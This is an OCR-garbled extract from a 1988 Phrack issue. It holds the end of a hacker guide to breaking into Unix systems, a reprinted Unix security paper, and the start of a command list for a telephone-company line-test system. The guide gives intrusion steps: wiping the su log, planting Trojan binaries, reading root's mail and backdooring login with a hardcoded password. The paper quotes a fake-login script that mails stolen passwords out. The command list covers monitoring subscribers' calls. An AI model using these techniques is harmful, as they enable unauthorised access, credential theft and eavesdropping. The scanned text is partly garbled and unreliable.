understand (and I don’t get it fully), then I won’t bother with it any 
more. 


-Trivial su. 


You know with su you can log into anyone else’s account if you know their 
passwords or if you’re root. There are still a number of system 5’s that 
have uid 0, null passwd, rsh accounts on them. Just be sure to remove your 
entry in /usr/adm/sulog. 


-Trojan horses? On Unix? 


Yes, but because of the shell variable PATH, we are generally out of luck, 
because it usually searches /bin and /usr/bin first. However, if the first 
field is a colon, files in the present directory are searched first. Which 
means if you put a modified version of ’1ls’ there, hey. If this isn’t the 
case, you will have to try something more blatant, like putting it ina 
game (see Shooting Shark’s file a while back). If you have a system login, 
you may be able to get something done like that. See cron. 


Taking over: 


Once you have root privs, you should read all the mail in /usr/mail, just 
to sure nothing interesting is up, or anyone is passing another systems 
passwds about. You may want to add another entry to the passwd file, but 
that’s relatively dangerous to the life of your machine. Be sure not to 
have anything out of the ordinary as the entry (i.e., No uid 0). 


Get a copy of the login program (available at your nearest decent BBS, I 
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hope) of that same version of Unix, and modify it a bit: on system 5, 
here’s a modification pretty common: in the routine to check correct 
passwds, on the line before the actual pw check, put a if 

(! (stremp (pswd, "woof"))) return(1); to check for your ‘’backdoor’, enabling 
you to log on as any valid user that isn’t uid 0 (On system 5). 


Neato things: 


Have you ever been on a system that you couldn’t get root or read the 
Systems/L.sys file? Well, this is a cheap way to overcome it: ‘’uuname’ 
will list all machines reachable by your Unix, then (Assuming they aren’t 
Direct, and the modem is available): 

S$ cu -d host.you.want or] 

S uucico -x99 -rl -shost.you.want 
Both will do about the same for us. This will fill your screen with lots 
of trivial material, but will eventually get to the point of printing the 
phone number to the other system. d enables the cu diagnostics, -x99 
enables the uucico highest debug, and -Rl says ‘’uucp master’. 


Back a year or two, almost everywhere had their uucp passwd set to the same 
thing as their nuucp passwd (Thanks to the Systems file), so it was a 


breeze getting in. Even nowadays, some places do it.. You never can tell. 
—Uucp: 
I personally don’t like the uucp things. Uucico and uux are limited by the 


Permissions file, and in most cases, that means you can’t do anything 
except get & take from the uucppublic dirs. Then again, if the 
permission/L.cmd is blank, you should be able to take what files that you 
want. I still don’t like it. 


-Sending mail: 
Sometimes, the mail program checks only the shell var LOGNAME, so change 
it, export it, and you may be able to send mail as anyone. (Mainly early 
system 5’s.) 
$ LOGNAME="root";export LOGNAM 


GJ 


-Printing out all the files on the system: 


Useful if you’re interested in the filenames. 

S$ find / -print >file_listé 
And then do a ’grep text file_list’ to find any files with ’text’ in their 
names. Like grep [.]c file_list, grep host file_list.... 


—-Printing out all restricted files: 


Useful when you have root. As a normal user, do: 

$ find / -print >/dev/nulls 
This prints out all nonaccessable directories, so become root and see what 
they are hiding. 


-Printing out all the files in a directory: 


Better looking than 1s -R: 

$ find . -print 
It starts at the present dir, and goes all the way down. Catches all 
fi bes) boo. 


-Rsh: 

Well in the case of having an account with rsh only, check your ’set’. If 
SHELL is not /bin/sh, and you are able to run anything with a shell escape 
(ex, ed, vi, write, mail...), you should be put into sh if you do a ’!sh’. 


If you have write permission on your .profile, change it, because rsh is 
ran after checking profile. 
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-Humor: 


On a system 5, do a: 
S$ cat "food in cans" 


or on a csh, do: 


i 


% hey unix, got a match? 


Well, I didn’t say it was great. 


Password hacking: 
-Salt: 


In a standard /etc/passwd file, passwords are 13 characters long. This is 
an 11 char encrypted passwd and a 2 char encryption modifier (salt), which 
is used to change the des algorithm in one of 4096<?> ways. Which means 
there is no decent way to go and reverse hack it. Yet. 


On normal system 5 Unix, passwords are supposed to be 6-8 characters long 
and have both numeric and alphabetic characters in them, which makes a 


dictionary hacker pretty worthless. However, if a user keeps insisting his 
password is going to be ‘dog,’ usually the system will comply (depending on 
version). I have yet to try it, but having the hacker try the normal 


entry, and then the entry terminated by [0-9] is said to have remarkable 
results, if you don’t mind the 10-fold increase in time. 


Final notes: 


Yes, I have left a lot out. That seems to be the rage nowadays.. If you 
have noticed something wrong, or didn’t like this, feel fr to tell m 
If you can find me. 


Hi Ho. Here ends part one. <Of one?> 


Produced and directed by: Urvile & Necron 99 
(c) ToK inc., 1988 
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==Phrack Inc.== 


Volume Two, Issue 18, Phile #7 of 11 


"Unix System Security Issues" 
Typed by: 
Whisky 
(from Holland, Europe) 


From 
Information Age 
Vol. 11, Number 2, April 1988 
Written By: 
Michael J. Knox and Edward D. Bowden 


Note: This file was sent to me from a friend in Holland. I felt 
that it would be a good idea to present this file to the 
UNIX-hacker community, to show that hackers don’t always 
harm systems, but sometimes look for ways to secure flaws 
in existing systems. Jester Sluggo !! 


There are a number of elements that have lead to the popularity of the Unix 
operating system in the world today. The most notable factors are its 
portability among hardware platforms and the interactive programming 


environment that it offers to users. In fact, these elements have had much to 


do with the successful evolution of the Unix system in the commercial market 
place. (1, 2) 


As the Unix system expands further into industry and government, the need to 
handle Unix system security will no doubt become imperative. For example, the 
US government is committing several million dollars a year for the Unix system 


and its supported hardware. (1) The security requirements for the government 
are tremendous, and one can only guess at the future needs of security in 
industry. 

In this paper, we will cover some of the more fundamental security risks in 
the Unix system. Discussed are common causes of Unix system compromise in 
such areas as file protection, password security, networking and hacker 
violations. In our conclusion, we will comment upon ongoing effects in Unix 
system security, and their direct influence on the portability of the Unix 
operating system. 


FILE AND DIRECTORY SECURITY 


In the Unix operating system environment, files and directories are organized 
in a tree structure with specific access modes. The setting of these modes, 
through permission bits (as octal digits), is the basis of Unix system 
security. Permission bits determine how users can access files and the type 
of access they are allowed. There are thr user access modes for all Unix 
system files and directories: the owner, the group, and others. Access to 
read, write and execute within each of the usertypes is also controlled by 
permission bits (Figure 1). Flexibility in file security is convenient, but 
it has been criticized as an area of system security compromise. 


Permission modes 


OWNER GROUP OTHERS 
rwx : rwx 3 rwx 
r=read w=writ x=execut 


—-rw--w-r-x 1 bob csc532 70 Apr 23 20:10 file 


drwx------ 2 sam Al 2 May O01 12:01 directory 
FIGURE 1. File and directory modes: File shows Bob as the owner, with read 
and write permission. Group has write permission, while Others has read and 


execute permission. The directory gives a secure directory not readable, 
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writeable, or executable by Group and Others. 


Since the file protection mechanism is so important in the Unix operating 
system, it stands to reason that the proper setting of permission bits is 
required for overall security. Aside from user ignorance, the most common 
area of file compromise has to do with the default setting of permission bits 
at file creation. In some systems the default is octal 644, meaning that only 
the file owner can write and read to a file, while all others can only read 
Tt. (3) In many "open" environments this may be acceptable. However, in 
cases where sensitive data is present, the access for reading by others should 
be turned off. The file utility umask does in fact satisfy this requirement. 
A suggested setting, umask 027, would enable all permission for the file 
owner, disable write permission to the group, and disable permissions for all 
others (octal 750). By inserting this umask command in a user .profile or 
-login file, the default will be overwritten by the new settings at file 
creation. 

The CHMOD utility can be used to modify permission settings on files and 
directories. Issuing the following command, 


chmod utrwd,gtrw,g-w,u-rwx file 


will provide the file with the same protection as the umask above (octal 750). 
Permission bits can be relaxed with chmod at a later time, but at least 
initially, the file structure can be made secure using a restrictive umask. 

By responsible application of such utilities as umask and chmod, users can 

nhance file system security. The Unix system, however, restricts the 
security defined by the user to only owner, group and others. Thus, the owner 
of the file cannot designate file access to specific users. As Kowack and 
Healy have pointed out, "The granularity of control that (file security) 
mechanisms is often insufficient in practice (...) it is not possible to grant 
one user write protection to a directory while granting another read 
permission to the same directory. (4) A useful file security file security 
extension to the Unix system might be Multics style access control lists. 

With access mode vulnerabilities in mind, users should pay close attention 
to files and directories under their control, and correct permissions whenever 
possible. Even with the design limitations in mode granularity, following a 
safe approach will ensure a more secure Unix system file structure. 


SUID and SGID 


The set user id (suid) and set group id (sgid) identify the user and group 
ownership of a file. By setting the suid or sgid permission bits of an 
executabl file, other users can gain access to the same resources (via the 
executable file) as that of the real file’s owner. 


For Example: 


Let Bob’s program bob.x be an executable file accessible to others. When Mary 
executes bob.x, Mary becomes the new program owner. If during program 
execution bob.x requests access to file browse.txt, then Mary must have 
previous read or write permission to browse.txt. This would allow Mary and 
veryon lse total access to the contents of browse.txt, even when she is not 
running bob.x. By turning on the suid bit of bob.x, Mary will have the same 
access permissions to browse.txt as does the program’s real owner, but she 
will only have access to browse.txt during the execution of bob.x. Hence, by 
incorporating suid or sgid, unwelcome browsers will be prevented from 
accessing files like browse.txt. 


Although this feature appears to offer substantial access control to Unix 
system files, it does have one critical drawback. There is always the chance 
that the superuser (system administrator) may have a writable file for others 
that is also set with suid. With some modification in the file’s code (by a 
hacker), an executable file like this would enable a user to become a 
superuser. Within a short period of time this violator could completely 
compromise system security and make it inaccessible, even to other superusers. 
As Farrow (5) puts it, "(...) having a set-user-id copy of the shell owned by 
root is better than knowing the root password". 
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To compensate for this security threat, writable suid files should be sought 
out and eliminated by the system administrator. Reporting of such files by 
normal users is also essential in correcting existing security breaches. 


DIRECTORIES 


Directory protection is commonly overlooked component of file security in the 
Unix system. Many system administrators and users are unaware of the fact, 
that "publicly writable directories provide the most opportunities for 
compromising the Unix system security" (6). Administrators tend to make these 
"open" for users to move around and access public files and utilities. This 
can be disastrous, since files and other subdirectories within writable 
directories can be moved out and replaced with different versions, even if 
contained files are unreadable or unwritable to others. When this happens, an 
unscrupulous user or a "password breaker" may supplant a Trojan horse of a 
commonly used system utility (e.g. ls, su, mail and so on). For example, 
imagine 


For example: 


Imagine that the /bin directory is publicly writable. The perpetrator could 
first remove the old su version (with rm utility) and then include his own 
fake su to read the password of users who execute this utility. 


Although writable directories can destroy system integrity, readable ones 
can be just as damaging. Sometimes files and directories are configured to 
permit read access by other. This subtle convenience can lead to unauthorized 
disclosure of sensitive data: a serious matter when valuable information is 
lost to a business competitor. 

As a general rule, therefore, read and write access should be removed from 
all but system administrative directories. Execute permission will allow 
access to needed files; however, users might explicitly name the file they 
wish to use. This adds some protection to unreadable and unwritable 
directories. So, programs like lp file.x in an unreadable directory /ddr will 
print the contents of file.x, while ls/ddr would not list the contents of that 
directory. 


PATH VARIABL 


13 


PATH is an environment variable that points to a list of directories, which 
are searched when a file is requested by a process. The order of that search 
is indicated by the sequence of the listed directories in the PATH name. This 
variable is established at user logon and is set up in the users .profile of 


-login file. 
If a user places the current directory as the first entry in PATH, then 
programs in the current directory will be run first. Programs in other 


directories with the same name will be ignored. Although file and directory 
access is made easier with a PATH variable set up this way, it may expose the 
user to pre-existing Trojan horses. 

To illustrate this, assume that a Trojan horse, similar to the cat utility, 
contains an instruction that imparts access privileges to a perpetrator. The 
fake cat is placed in a public directory /usr/his where a user often works. 
Now if the user has a PATH variable with the current directory first, and he 
enters the cat command while in /usr/his, the fake cat in /usr/his would be 
executed but not the system cat located in /bin. 

In order to prevent this kind of system violation, the PATH variable must be 
correctly set. First, if at all possible, exclude the current directory as 
the first entry in the PATH variable and type the full path name when invoking 
Unix system commands. This enhances file security, but is more cumbersome to 
work with. Second, if the working directory must be included in the PATH 
variable, then it should always be listed last. In this way, utilities like 
vi, cat, su and 1s will be executed first from systems directories like /bin 
and /usr/bin before searching the user’s working directory. 


PASSWORD SECURITY 


User authentication in the Unix system is accomplished by personal passwords. 
Though passwords offer an additional level of security beyond physical 
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constraints, they lend themselves to the greatest area of computer system 
compromise. Lack of user awareness and responsibility contributes largely to 
this form of computer insecurity. This is true of many computer facilities 
where password identification, authentication and authorization are required 
for the access of resources - and the Unix operating system is no exception. 

Password information in many time-sharing systems are kept in restricted 
files that are not ordinarily readable by users. The Unix system differs in 
this respect, since it allows all users to have read access to the /etc/passwd 
file (FIGURE 2) where encrypted passwords and other user information are 
stored. Although the Unix system implements a one-way encryption method, and 
in most systems a modified version of the data encryption standard (DES), 
password breaking methods are known. Among these methods, brute-force attacks 
are generally the least effective, yet techniques involving the use of 
heuristics (good guesses and knowledge about passwords) tend to be successful. 
For example, the /etc/passwd file contains such useful information as the 
login name and comments fields. Login names are especially rewarding to the 
"password breaker" since many users will use login variants for passwords 
(backward spelling, the appending of a single digit etc.). The comment field 
often contains items such as surname, given name, address, telephone number, 
project name and so on. To quote Morris and Grampp (7) in their landmark 
paper on Unix system security: 


[in the case of logins] 


The authors made a survey of several dozen local machines, using as trial 
passwords a collection of the 20 most common female first names, each 
followed by a single digit. The total number of passwords tried was, 
therefore, 200. At least one of these 200 passwords turned out to be a 
valid password on every machine surveyed. 


[as for comment fields] 


(...) if an intruder knows something about the people using a machine, a 
whole new set of candidates is available. Family and friend’s names, auto 
registration numbers, hobbies, and pets are particularly productive 
categories to try interactively in the unlikely event that a purely 
mechanical scan of the password file turns out to be disappointing. 


Thus, given a persistent system violator, there is a strong evidence, that he 
will find some information about users in the /etc/passwd file. With this in 
mind, it is obvious that a password file should be unreadable to everyon 
except those in charge of system administration. 


root :aN2z061SmxKqQ:0:10: (Boss1) , 656-35-0989:/:/bin 
mike: 9okduHy7sdLK8:09:122:No.992-3943:/usr:/bin 


FIGURE 2. The /etc/passwd file. Note the comments field as underlined terms. 


Resolution of the /etc/passwd file’s readability does not entirely solve the 
basic problem with passwords. Educating users and administrators is necessary 
to assure proper password utilization. First, "good passwords are those that 
are at least six characters long, aren’t based on personal information, and 
have some non-alphabetic (especially control) characters in them: 4score, 
my_name, luv2run" (8). Secondly, passwords should be changed periodically but 
users should avoid alternating between two passwords. Different passwords for 
different machines and files will aid in protecting sensitive information. 
Finally, passwords should never be available to unauthorized users. Reduction 
of user ignorance about poor password choice will inevitably make a system 
more secure. 


NETWORK SECURITY 


UUCP system 

The most common Unix system network is the UUCP system, which is a group of 
programs that perform the file transfers and command execution between remot 
systems. (3) The problem with the UUCP system is that users on the network 
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user. It is up to the individual sites to be aware of this, and apply the 
protections that they feel fr are necessary. 
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There are four UUCP system commands to consider when looking into network 


curity with the Unix system. The first is uucp, a command used to copy 

les between two Unix systems. If uucp is not properly implemented by the 
stem administrator, any outside user can execute remote commands and copy 
les from another login user. If the file name on another system is known, 


e could use the uucp command to copy files from that system to their system. 
r example: 


Suucp system2!/main/src/hisfile myfile 


1l copy hisfile from system2 in the directory /main/srce to the file myfile 
the current local directory. If file transfer restrictions exist on either 
stem, hisfile would not be sent. If there are no restrictions, any file 

uld be copied from a remote user - including the password file. The 

llowing would copy the remote system /etc/passwd file to the local file 
anks: 


Suucp system2!/etc/passwd thanks 


stem administrators can address the uucp matter by restricting uucp file 
ansfers to the directory /user/spool/uucppublic. (8) If one tries to 
ansfer a file anywher lse, a message will be returned saying "remote 
cess to path/file denied" and no file transfer will occur. 

The second UUCP system command to consider is the uux. Its function is to 
ecute commands on remote Unix computers. This is called remote command 
ecution and is most often used to send mail between systems (mail executes 
e uux command internally). 

The ability to execute a command on another system introduces a serious 
curity problem if remote command execution is not limited. As an example, a 
stem should not allow users from another system to perform the following: 


Suux "systeml!cat</etc/passwd>/usr/spool/uucppublic" 


ich would cause systeml to send its /etc/passwd file to the system2 uucp 
blic directory. The user of system2 would now have access to the password 
le. Therefore, only a few commands should be allowed to execute remotely. 
ten the only command allowed to run uux is rmail, the restricted mail 
ogram. 

The third UUCP system function is the uucico (copy in / copy out) program. 


It performs the true communication work. Uucp or uux does not actually call 
up other systems; instead they are queued and the uucico program initiates the 
remote processes. The uucico program uses the file /usr/uucp/USERFILE to 
determine what files a remote system may send or receive. Checks for legal 
files are the basis for security in USERFILE. Thus the system administrator 
should carefully control this file. 
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In addition, USERFILE controls security between two Unix systems by allowing 
call-back flag to be set. Therefore, some degr of security can be 

hieved by requiring a system to check if the remote system is legal before a 
ll-back occurs. 

The last UUCP function is the uuxqt. It controls the remote command 
ecution. The uuxqt program uses the file /usr/lib/uucp/L.cmd to determine 
ich commands will run in response to a remote execution request. For 

ample, if one wishes to use the electronic mail feature, then the L.cmd file 
11 contain the line rmail. Since uuxqt determines what commands will be 
lowed to execute remotely, commands which may compromise system security 
ould not be included in L.cmd. 


5 


CALL THE UNIX SYSTEM 
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In addition to UUCP network commands, one should also be cautious of the cu 
command (call the Unix system). Cu permits a remote user to call another 
computer system. The problem with cu is that a user on a system with a weak 
security can use cu to connect to a more secure system and then install a 
Trojan horse on the stronger system. It is apparent that cu should not be 
used to go from a weaker system to a stronger one, and it is up to the system 
administrator to ensure that this never occurs. 


LOCAL AREA NETWORKS 


With the increased number of computers operating under the Unix system, some 
consideration must be given to local area networks (LANs). Because LANs are 
designed to transmit files between computers quickly, security has not been a 
priority with many LANs, but there are secure LANs under development. It is 
the job of the system manager to investigate security risks when employing 
LANs. 


OTHER AREAS OF COMPROMIS 


Gl 


There are numerous methods used by hackers to gain entry into computer 
systems. In the Unix system, Trojan horses, spoofs and suids are the primary 
weapons used by trespassers. 

Trojan horses are pieces of code or shell scripts which usually assume the 
role of a common utility but when activated by an unsuspecting user performs 
some unexpected task for the trespasser. Among the many different Trojan 
horses, it is the su masquerade that is the most dangerous to the Unix system. 

Recall that the /etc/passwd file is readable to others, and also contains 
information about all users - even root users. Consider what a hacker could 
do if he were able to read this file and locate a root user with a writable 
directory. He might easily plant a fake su that would send the root password 
back to the hacker. A Trojan horse similar to this can often be avoided when 
various security measures are followed, that is, an etc/passwd file with 
limited read access, controlling writable directories, and the PATH variable 
properly set. 

A spoof is basically a hoax that causes an unsuspecting victim to believe 
that a masquerading computer function is actually a real system operation. A 
very popular spool in many computer systems is the terminal-login trap. By 
displaying a phoney login format, a hacker is able to capture the user’s 
password. 

Imagine that a root user has temporarily deserted his terminal. A hacker 
could quickly install a login process like the one described by Morris and 
Grampp (7): 


echo -n "login:" 
read X 

stty -echo 

echo -n "password:" 
read Y 

echo Wwe 

stty echo 

echo SX%SY|mail outside|hacker& 
sleep 1 

echo Login incorrect 
stty 0>/dev/tty 


We see that the password of the root user is mailed to the hacker who has 
completely compromised the Unix system. The fake terminal-login acts as if 
the user has incorrectly entered the password. It then transfers control over 
to the stty process, thereby leaving no trace of its existence. 

Prevention of spoofs, like most security hazards, must begin with user 
education. But an immediate solution to security is sometimes needed befor 
education can be effected. As for terminal-login spoofs, there are some 
keyboard-locking programs that protect the login session while users are away 
from their terminals. (8, 10) These locked programs ignore keyboard-generated 
interrupts and wait for the user to enter a password to resume the terminal 
session. 

Since the suid mode has been previously examined in the password section, we 
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merely indicate some suid solutions here. First, suid programs should be used 
is there are no other alternatives. Unrestrained suids or sgids can lead to 
system compromise. Second, a "restricted shell" should be given to a process 
that escapes from a suid process to a child process. The reason for this is 
that a nonprivileged child process might inherit privileged files from its 
parents. Finally, suid files should be writable only by their owners, 
otherwise others may have access to overwrite the file contents. 

It can be seen that by applying some basic security principles, a user can 
avoid Trojan horses, spoofs and inappropriate suids. There are several other 
techniques used by hackers to compromise system security, but the use of good 
judgement and user education may go far in preventing their occurrence. 


CONCLUSION 


Throughout this paper we have discussed conventional approaches to Unix system 
security by way of practical file management, password protection, and 
networking. While it can be argued that user education is paramount in 
maintaining Unix system security (11) factors in human error will promote some 
degree of system insecurity. Advances in protection mechanisms through 
better-written software (12), centralized password control (13) and 
identification devices may result in enhanced Unix system security. 

The question now asked applies to the future of Unix system operating. Can 
existing Unix systems accommodate the security requirements of government and 
industry? It appears not, at least for governmental security projects. By 
following the Orange Book (14), a government graded classification of secure 
computer systems, the Unix system is only as secure as the Cl criterion. A Cl 
system, which has a low security rating (D being the lowest) provides only 
discretionary security protection (DSP) against browsers or non-programmer 
users. Clearly this is insufficient as far as defense or proprietary security 
is concerned. What is needed are fundamental changes to the Unix security 
system. This has been recognized by at least three companies, AT&T, Gould and 
Honeywell (15, 16, 17). Gould, in particular, has made vital changes to the 
kernel and file system in order to produce a C2 rated Unix operating system. 
To achieve this, however, they have had to sacrifice some of the portability 
of the Unix system. It is hoped that in the near future a Unix system with an 
Al classification will be realized, though not at the expense of losing its 
valued portability. 
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==Phrack Inc.== 
Volume Two, Issue 18, Phile #8 of 11 
Control C 
and 
The Tribunal of Knowledge presents... 
LMOS (Loop Maintenance Operation System) 


-A List of Commands-— 


This file contains what to our knowledge are the best things to do on 
LMOS. We were really vague due to the great power of the information provided 
in this file. You now know the commands so we will not go into (either in 
this file or when talking to us) how to use this information, it is up to you 
to figure out how to use it. 


+; Increase the voice volume on a line 


+ lets you increase the volume when you are talking on or monitoring a 
sub-scriber’s line over a callback path. The volume is increased because MLT 
adds amplifier to the line. + may be used after a mon, talk, rev, talkin or 
call request. Sometimes MLT adds an amplifier automatically to a long line. 
You will not know it is there so if you try to add amplification, a + will 
appear in the status sections but the voices will not get any louder because 
they are already loud as possible. 


Decrease the voice volume on a line 


—- lets you decrease the volume when you are talking on or monitoring a 
subscriber’s line over a callback path. The volume is decreased because MLT 


removes amplifier from the line. - may be used to remove amplifier that you 
have placed on the line with the + request, or amplifier that MLT has 
automatically places on a long line. The main reason to remove the amplifier 


is because it can sometimes cause a shrill or howl. 


Call: Make a call on a subscriber’s line 
Call lets you use your touch-tone pad to dial any number you want using the 
customer’s line circuit. It does this by simulating an off-hook condition in 


order to draw dial tone. A callback number is a required entry on the tv mask 
and an mdf access is required for calling out (except in SXS and panel 


offices). You can use a call when: 1) You want to know the TN for a known CA 
& PR -— you would call TSPS or ANI. 2) Calls cannot be completed to a TN - you 
would call that TN. 3) To monitor dial tone on a customer’s line. 


Callrd: Make a call on a dial pulse line circuit 


Callrd lets you use your touch-tone pad to dial using the customer’s rotary 
dial line circuit. MLT does this by translating tones on a customer’s line. 
mdf access is required for calling out (except in SXS, DMS10, DMS100, and 
DMS100AC offices). Use a callrd if you want to know the TN for a known CA & 
PR —- you would call TSPS or ANI. 


Ccol: Collect coins using coin relay 


Ccol attempts to collect any coins that are in the hopper of a coin telephone 
set by operating the coin relay. Ccol does not check the totalizer or check 


the rest of the line. The results tell you only about relay operation, speed, 
and the current that is necessary to operate it. A ver code is not returned 
by ccol. You must have access to the line before your request ccol. You will 


use ccol most often when you are talking to a repair person who is trying to 
fix a coin phone. 


Channel: Run enhanced channel tests on DLC lines 
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Chan or channel runs channel isolation tests and tells you if you have a bad 
COT or RT channel unit. Use this request to run enhanced channel tests on 
lines served by digital loop carriers such as SLC Series 5. Chan can only be 
run if there is special equipment in the co you’re testing in. If you are 
testing a non-locally switched line with the SSA request, channel tests must 
be run separately with this request. Chan may also be used to run channel 
isolation tests on switched lines from the tv or stv mask, but these tests are 
included when you do a full or loop on a switched line. 


Change: Change status information 


Change allows you to change cable, pair or comment information that is 
displayed without having to request a test or any other type of information. 
the permanent line record information is not changed. To request a change, 
enter "change" in the req field of the tv and enter the change of information. 


Chome: Home totalizer on a coin telephone 


Chome attempts to return a totalizer to the starting position (home) for 
counting coins. The totalizer counts the coins and sends a tone back to the 
co for every 5 cents deposited. If it is not homed, coins can’t be deposited. 
A chome request tells you whether the totalizer was homed, how many tones were 
sent to the co, and the current that was used to home the totalizer. A line 
must already be accessed to request a chome. Chome is often used when a 
repair person is trying to fix a coin telephone. 


Co: Test the central office equipment 


Co initiates a series of tests on the subscriber’s line circuit. Co can be 
requested using either a no-test or an MDF trunk. A no-test access connects 
you to the entire loop but a co request tests only the inside portion. An MDF 
access is only connected to the inside portion of the loop. The outside 
portion is physically disconnected. Use a no-test access when you are fairly 
sure the trouble is inside the central office. Use a co on an MDF access when 
you are not sure where the trouble is. 


Coin: Test a coin telephone set 


Coin initiates a full series of tests on a telephone line. The station set, 
the totalizer, the coin relay, the loop and the co equipment are checked. If 
the coin request finds something wrong with either the totalizer or the relay, 
it stops testing and tells you the trouble is in the set. If it finds nothing 
wrong, it runs the full entries of tests. Coin may be used when a repair 
person is trying to fix a coin telephone. If a coin phone is newly installed, 
coin will check the set even though there is no line record. 


Cret: Operate coin relay to return coins 


Cret attempts to return any coins that may be lodged in the hopper of a coin 
telephone set. It operates the coin relay so that it will return the coins. 
It tries to return them 3 times before giving up. If it is successful, it 
also checks the speed of the relay. It does not check the totalizer or the 
rest of the line. You should have access to the line before you request a 
cret. You will use cret primarily when you are talking to a repair person who 
is trying to repair coin telephone. 


Cset: Check totalizer and relay in coinset 


Cset checks the totalizer and the coin relay in a coin telephone set. The 
totalizer is the mechanism in the phone that counts deposited coins and sends 
a tone back to the co for every 5 cents that is deposited. The relay is the 
mechanism that either returns or collects the coins that are deposited. Cset 
does not check the co or loop parts of the line. Cset can be used when you 
are talking to a repair person who is fixing a coin telephone. 


Dial: Test a subscriber’s rotary dial 
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Dial checks the subscriber’s rotary dial. You must be in contact with the 
subscriber,either over a callback path or over a ddd line. For the dial 
request to work correctly, tell the subscriber to dial a "0" after hearing 
brief dial tone. The results of a dial request tell you whether the dial is 
okay or not, whether the dial speed is okay and what the speed is, and whether 
the break is okay and what the break is. Use the dial request when you 
suspect a problem with the telephone set. The trouble report could be "Can’t 
call out’ or ’Gets wrong numbers", for example. 


Dtout: Test a pbx line circuit 


Dtout initiates a series of tests on a pbx line circuit. Dtout must be 
requested using an MDF trunk. It is used to draw dial tone and check the 
arrangement of the pbx line circuit. Use dtout when you need to check the 
condition of special service circuits that do not use central office switches. 


Full: Test th ntire telephone lin 


Full starts a series of tests that do an extensive analysis of the entire 
line. This includes both the inside and outside portions. Many individual 
tests are run and the most important results are displayed in the summary 
message. Outside, MLT checks for AC and DC faults. Inside, it checks the line 
circuit and dial tone. The results may also include many other types of 
information about the line. You might request full line test when you first 
access a line or when you need to know a lot about a line. 


Grm: Get fast ground resistance measurement 


Grm gives you a quick measurement of the DC resistance of the ground path from 


the strap to the test hardware. Before you do a grm, have the repair person 
strap the tip and ring wires to ground. If this isn’t done, grm will give you 
incorrect values. The line must be accessed before you do a grm request. You 


can use grm when you are talking to a repair person who is fixing a coinset. 
The resistance values obtained from a grm can be compared to old resistance 
values that are stored inside each coinset. 


Help: List the valid tv requests 


Help returns a list of all of the valid requests used in MLT-2. Help can be 
used when you are not sure which request to use in a particular situation, or 
when you can’t remember an exact request name. For example, the correct entry 
to reverse polarity on a touch-tone line is "Rev.", help will tell you this. 
For a description of any specific request, enter the name of the request 
followed by a question mark. 


Info: Get general information about a line 


Info gives you the wire center name and the location of the frame; the 
exchange key, MDF group and MDF trunk numbers associated with the subscriber’s 
line; the telephone number at the appropriate frame; and the assignment 
telephone number. You can get information about a whole telephone number, an 
NPA-NXX-, or an exchange key. MLT does not access the line when you request 
info, but it keeps access if you already have it. If there are multiple 
frames in an office, MLT give you information about all of them. 


Keep: Keep an access that you already have 


Keep lets you hold access to a no-test or MDF trunk that is about to 
"timeout." MLT keeps track of which trunks you have accessed but have not 
used for a while. MLT will automatically drop the access for you after a 
certain period of time. About 2 minutes before dropping the access, MLT gives 
you a warning message and also highlights the status line that will be 
dropped. If you want to keep the access, you should enter "keep" in the req 
field and the tn or line number of the access to be held. To drop an access 
when your are finished with it, enter an x in the req field. 


Lin: Test the inside part of the loop 
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Lin starts a series of tests on the inside portion of a line. Lin includes 
the same tests as the loop test and can identify a co line circuit if one is 
present. Lin does not do the regular line circuit and draw and break dial 
tone tests. An MDF access is required for a lin request. You can use lin to 
test special circuit that do not use co switching machine. For example, if 
the circuit has 2 loops connected at the frame, lin lets you look at the 
second loop (both full and loop only test toward one loop). 


Lloop: Run the long loop analysis on the outside or loop part of a line 


The ll request starts a series of tests which do extensive analysis of the 
outside portion of the subscriber’s line. It is specifically designed to 
handle cases that the regular loop request was not designed to handle. These 
cases include very long loops (over 100,000 feet) and multiparty lines on 
moderate-to-very-long loops. It does similar measurements to those that loop 
does, but analyzes the results differently. It expects to see a loop that has 
no dc faults or only very light de faults. If you use a loop on lloop on a 
loop that has serious de faults it will not do the long loop analysis. 


Locl: Measure distance to 1-sided resistive fault 


Locl gets MLT to measure how far a one-sided fault is from the repair person, 
because telephone lines can be very long, it can be difficult for a repair 


person to find the location of a resistive fault. You can use locl to help 
the repair person have 1-sided fault. You should be in contact with the 
repair person on a line other than the one being measured. Have the repair 


person open the pr at a ready-access point beyond the fault if possible. Ask 
him/her to strap the pr tip to ring. Remember to enter a temperature on the 
tv mask before you transmit the locl request. 


Loc2: Measure distance to 2-sided resistive fault 


Loc2 gets MLT to measure how far a two-sided fault is from the repair person. 
Remember that you must run a locgp before you run a loc2 and that you must be 
in contact with the repair-person on a line other than the one you will be 
measuring. The repair-person must connect the bad pair to the good pair ina 
specific way, the exact method to use is explained in the results of the locgp 
request. Logcp and loc2 can also be used to sectionalize a one-sided 
resistive fault. Remember to enter a temperature on the tv mask before you 
transmit the loc2 request. 


Look: Look for an intentional fault 


Look is used to identify a fault, usually a short or ground, that has been 
placed on the line by the repair person. Look can be used when a repair 
person is having trouble locating a particular line. Look gets MLT to monitor 
the line that the repair person is looking for. When the repair person shorts 
or grounds the line, mlt sends a tone to you over your headset. You can tell 
the repair person that you "see the short". A callback path is required for a 
look request. You should talk to the repair person on a line other than the 
one you are working on. 


Lookin: Look for an intentional fault on a special services line 


Lookin is used to identify a fault, usually a short or ground, that has been 
placed on the special services line by the technician. Lookin is used to 
locate a particular line by having MLT monitor the line that the repair person 


is looking for. When the repair person shorts or grounds the line, MLT sends 
a tone to you over your headset. You can tell the repair person that you "See 
the short." A callback path is required for a lookin quest. You should talk 


to the repair person on a line other than the one you are working on. MDF 
access is required. 


Loop: Test the outside part of the loop 


Loop starts a series of tests that do an extensive analysis of the outside 
portion of the line. Loop does every test that full does except the lin 
circuit and draw and break dial tone tests. Loop can be requested using 
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either a no-test or an MDF trunk. A no-test access connects you to the entire 
line but a loop request tests only the outside portion. An MDF access is only 
connect to the outside portion. Use a no-test trunk when you are fairly sure 
the trouble is out of the co and an MDF when you are not sure. 


Lrm: Get fast loop resistance measurement 


lrm gives you a quick measurement of the DC resistance on a line. Lrm can’t 
be run unless either the receiver is off-hook or the line is strapped tip to 
ring (an intentional short is placed on the line by the repair person). Also, 
MLT will not accept an lrm request if there is a hard ground on the line. Lrm 
does not access the line so you must already have access to do an lrm. You 
can use lrm when you are talking to a repair person who is fixing a coinset. 
ae 
r 


he resistance values obtained from the lrm can be compared to the old 
esistance values that are stored inside each coinset. 


MDF (#): Access a specific MDF trunk 


MDF (#) lets you choose the MDF trunk that you want MLT to access. Use this 
request when an MDF trunk is connected to a telephone line at the MDF but is 
